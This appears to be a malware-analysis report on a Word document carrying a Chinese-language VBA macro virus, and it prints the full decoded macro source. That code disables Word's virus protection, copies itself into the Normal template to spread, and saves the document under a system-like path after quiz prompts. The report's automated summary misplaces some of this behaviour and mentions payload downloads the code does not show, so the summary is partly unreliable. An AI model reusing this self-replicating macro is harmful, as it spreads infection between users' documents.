MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to copy itself to the normal template and then presents the user with a series of input boxes disguised as urgent questions. This behavior suggests an attempt to engage the user while the macro performs its intended malicious actions, potentially downloading or executing further payloads.
Heuristics 4
-
ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bptk-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3339 bytes |
SHA-256: 6b8fdff9a927f5d2a4cac4b1926f0740883368bb0dc226d61943bebcaa5c7ba7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String
Private Sub Document_Close()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
t.CodeModule.AddFromString Src
NormalTemplate.Save
ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
Do
r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
& "A.3米4 B.3米5 C.3米55 D.3米7" & Chr(13) & Chr(13) _
& "要好好思考哟!", "紧急提问"))
Loop Until r <> ""
If r = "B" Then
MsgBox "好棒哟!"
GoTo 10
Else
MsgBox "唉!再给你一次机会."
Do
r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
& "A.标准型 B.普通型 C.豪华型" & Chr(13) & Chr(13) _
& "想好了再回答!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "谢谢你的支持!"
GoTo 10
Else
MsgBox "笨蛋!给你最后一次机会."
Do
r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
& "A.防止撞车 B.防止侧滑 C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
& "这是最后一次机会哟!", "紧急提问"))
Loop Until r <> ""
If r = "C" Then
MsgBox "总算答对了!"
GoTo 10
Else
MsgBox "看来你还需要对长安之星多加了解..."
ActiveDocument.SaveAs "c:\lzc.vxd"
ActiveDocument.Close
Exit Sub
End If
End If
End If
End If
10:
Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
d.CodeModule.AddFromString Src
ActiveDocument.Save
End If
End Sub
Private Sub Document_Open()
On Error Resume Next
Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
Options.VirusProtection = False
If DI And Not (TI) Then
t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
ElseIf TI And Not (DI) Then
d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.